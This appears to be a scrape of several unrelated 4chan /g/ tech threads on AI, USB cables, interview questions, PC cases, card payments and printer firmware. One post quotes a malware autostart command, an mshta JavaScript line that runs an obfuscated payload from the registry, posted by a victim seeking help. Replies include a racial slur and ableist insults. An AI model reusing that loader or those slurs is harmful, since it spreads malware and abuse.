What areas of AI are about smart robots/singularity AI type stuff?
I've been reading about AI lately and it's huge. I thought it was pretty much all focused on the one goal but without context it's hard to understand the usefulness/what things are applied to.
>>57044219
None.
all AI is Linked lists.

What about the connectome? (The one where someone decided to take a worm's neurons and put it into a Lego robot.)
Couldn't that be used in artificial intelligence?

You OK?
Say you want to have a USB-micro, mini and type-C plugs readily available on your desk from a single cable from your PC.
How would you go and solve this problem? I'm looking for pic related but with the 3 adapters I've mentioned and I can't seem to find such a thing anywhere.
Help me out you wankers.
>>57044202
you can find them around.
search 5 in 1 cable on ali or something.
if not, solder one yourself.
Or just get a USB hub, throw the one USB plug into the computer, plug your cables into the hub and then snake the cables up to the desk

Hey /g/uys. Pleb here (no bully pls).
Let's say I have a laptop that's part of a closed network but this laptop's account is not the administrator. How would I hypothetically go about installing windows 7 on it?
Why would you need to be an administrator to install an OS? Just get some install media and boot into it. Then install over the previous OS or partition and dual boot.
>>57044063
>install media
>partition
>dual boot
Maybe you misunderstood when I said "pleb here"
Is it really that difficult /g/?
what are some qualities of a good technical interview question? It's for an internship so I'm trying not to filter for any domain-specific knowledge, but I can't think of anything that is like harder than fizzbuzz without requiring some weird trick.
>>57043973
Banter. Look for signs of autism and antisocial behavior. Avoid it. Fizzbuzz to close if they don't seem to be having an internal meltdown.
>>57044011
We do behavioral interviews in a separate round, and I did a bunch of those last year so I'm not too worried.
Create a program to find the distance between two X,Y coordinate pairs, using only the addition and subtraction operations, and only one other variable besides the ones used to pass the coordinates.
Hello /g/, i have something which might interest you.
Recently this link showed in my Autostart folder (it's Windows 7):
C:\Windows\system32\mshta.exe "javascript:rCc94e="r";K8d=new ActiveXObject("WScript.Shell");Y6eEC0="lyI6mn";Kbvy6=K8d.RegRead("HKCU\\software\\lkxbln\\ruirnfsd");EXipXG4s="gJnaK";eval(Kbvy6);UTb2tk="CtA";"
It was not very annoying, but I suspected it to be a virus, and dealt with it by removing the link from Autostart folder, as well as deleting the registry entry. Before deleting, though, I looked at what was inside the registry value. It was a very obfuscated (49 KB) Javascript code, which is beyond my reach. There were also 7 other keys in the entry.
I saved the registry entry outside and removed it from the registry.
Here you can find the registry entry if you are interested: https:||filetea.me|t1sCxAzwdpPSGq9H0FGmmvWQQ (ofc, deal with care)
What does the command do? Is it dangerous?
Did the file expire? Alternate link:
https: filetea.me t1sDlOc2qd2S8eCaDoM9H8n7w
>>57044000
what the fuck is filetea? pastebin that shit nigger or get out
>>57044072
I can't pastebin the registry file.
I mean, I can copy paste contents to a txt, but I noticed that by doing so I lose information from one key (only the beginning 16 or so characters were being copied, and the key is like 30 kB in size).
If filetea isn't good, where should I upload the registry file?
Fucking help me out /g/. I got a micro ATX system for my parents and I'm sperging out because the fucking mobo doesn't seem to fit the case.
https://www.overclockers.co.uk/kolink-satellite-micro-atx-cube-case-black-ca-005-kk.html
http://motherboardbenchmark.net/msi-b150m-pro-vdh-d3/
both of these fuckers are described as micro ATX, but the mobo is too long, the power supply blocks a good few cm of it. What did I do wrong? Did I fall for the micro ATX meme?
so this is how it fits
"and even Micro-ATX boards up to 22.6cm x 18cm."
It doesn't support all micro-ATX boards (if any)
>Buying noname 25$ cases
>>57044159
its a minimal cost build for normies, I had to cheap out somewhere. Fucking jewish shit. The store page didn't even mention that it won't support longer ATX boards. I didn''t even think it is a thing.

Should probably post this on /biz/ rather than on /g/, but maybe you're not all NEET.
I'm starting a business, will be operating from a van in the UK. In addition to taking cash for my services i want to facility to offer card payment to customers.
Any recommendations for a way of taking card payment that won't have a big monthly subscription.
Transactions will be around £150 - £450 with two of those taking place a day.
Available technology:
>OnePlus 3 with 4G (LTE)
>Pixel C using OnePlus hotspot
>shitty basic laptop only really used for running a program essential for the service I offer
So some kind of device using my hotspot WiFi, or Bluetooth to either of the android devices.
Pic unrelated.
Square/iZettle
Oh boy, well what are you trying to do here?
What kind of business is it? Different businesses receive different interchange rates. Some payment processors (E.g. square) will simplify this into a flat rate, but others will charge you that, plus a merchant bank fee, and maybe an equipment fee.
Processors with dedicated equipment will charge different amounts for different types of transactions. Do you expect it to be a 50-50 split between debit and credit? Premium credit cards with more benefits can charge higher fees to the merchant, which get passed on to you.
Your scenario makes you either a candidate for a portable solution (which uses bluetooth or the like to another device), or a mobile one (which just uses the mobile network directly). The latter is more reliable, but then you need some sort of data plan for the point of sale itself.
IMO, Square/flat fee is probably a miss for your transactions. You'd have to do card processing on the phone, that makes signatures awkward as well as PIN entry, and the phone is expensive too. You're better off with something that's portable but dedicated equipment with a digital signature screen and a PINpad.
>>57043820 here
So I ran a quote on a website with the following estimates
>average transaction volume: 6000 GBP a month, 200 GBP average transaction size (smaller end)
>60% debit, 20% credit, 20% premium credit
>all transactions happen via card present (NFC or chip, but no manually keying in numbers)
>need a mobile terminal that can process cards on the go, passing it either to wifi or bluetooth
The cheapest quote I got on this basis was approximately 65 GBP a month
>estimated 40.44 GBP in card fees
>18.60 GBP/mo for equipment (card reader)
>5.89 for misc account fees (security, plus a three pence fee for every authorization).
The equipment in this deal would be a Spire SPw60. Hardwire Ethernet or wifi connection, color screen, sign on the screen, inbuilt PIN PAD, contafctless supported. Funds settle in three days.
That would put your cost of card acceptance at 65GBP for 6,000 GBP in transactions, or a little over one percent. This doesn't include any chargebacks (harder with chip-and-pin) or refunds (50 cents apiece).
Now, you go the cheap route, let's say you buy the reader from Paypal for 48 GBP. But then you're going to spend 1.5% - 2.75% of transaction per swipe. You're still subject to fees for chargebacks. You don't get a rate below 2.75% until you've processed more than 6000GBP a month. Let's say you do achieve this and you pay a 2% fee instead (you don't break 15K GBP a month). 2% of .02 is $120 a month, and the Paypal hardware is not as impressive as the Spire Spw60.
There are pros and cons to each, but generally dedicated equipment will give you a better experience, particularly if you look to integrate with point of sale hardware later.
Still running the old winamp here, hopefully they remain anti-bloat/adware..
>>57043685
Same. They had an updated (2013) version that only worked until some predetermined date because it was beta and you needed to download the newer version. That newer version never came and nobody bothered to crack it as far as I know.
I guess I can probably inject a dll and hook whatever call it's using to get time. But anyway, that's besides the point, which is I'm still running winamp and it runs like a dream. I sincerely do hope they release a new version. However, that page has been the case for at least a year as far as I can remember.
Why not use foobar

Why use foobar?
Hewlett Packard just released a new firmware version for a select line of inkjets that re-enables the printer to use 3rd party inks.
If you were one of those people that owns an HP Inkjet, and in September you found your printer all of sudden reported errors that counterfeit inks were installed, and prevented your printer from printing, this new firmware revision will correct that issue and allow you to use 3rd party inks again.
I have an HP 8620 that was affected. After installing this revised firmware update (FDP1CN1640BR), ALL my 3rd party inks are operational again, and I'm able to print,
DON'T FORGET TO TURN OFF AUTOMATIC FIRMWARE UPDATES SO HP WON'T FUCK YOU AGAIN.
If your printer was affected, check the HP driver download page for your model to see if the new firmware is available.
This link lists what model printers will be getting the new firmware.

>>57043674
Is this the software on the computer or the actual firmware in the printer itself?
Who the fuck even updates printer firmware? If it works just leave it alone.
Im an autist and not even I have updated printer firmware, I cant imagine a normie actually doing it.
Imagining a normie updating a printer firmware is like hearing my grandma say "I updated my bios"
>>57045564
As i remember it's checks for updates automagically (windows only).
>>57046166
My hp printer wouldnt work with the software on the cd, I just set it up through windows "add a printer" and it works automagically. I dont think its updated itself this way.
I also use it with its own hotspot now, which involves my laptop disconnecting from the internet, kinda shity but alteast I know it cant update itself like that.
